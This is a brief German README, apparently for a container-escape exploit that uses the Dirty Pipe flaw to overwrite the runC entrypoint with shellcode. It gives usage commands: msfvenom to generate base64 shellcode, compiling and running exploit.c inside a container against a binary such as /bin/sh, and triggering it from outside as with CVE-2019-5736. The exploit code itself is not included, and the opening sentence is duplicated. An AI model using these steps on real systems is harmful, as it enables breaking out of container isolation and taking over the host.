
Ein einfacher Exploit, der dirtypipe nutzt, um Shellcode in den runC-Entrypoint zu injizieren und Container-Escapes zu implementieren.
Ein einfacher Exploit, der dirtypipe nutzt, um Shellcode in den runC-Entrypoint zu injizieren und so Container-Escapes zu implementieren.
Erzeuge base64-kodierten Shellcode mit msf:
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64
Kompiliere und führe im Container aus; der überschriebene Dateiname ist die Binärdatei, die runC im Container ausführen wird (z. B. /bin/sh):
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>
Löse den Exploit und den Shellcode außerhalb des Containers aus, wie bei CVE-2019-5736.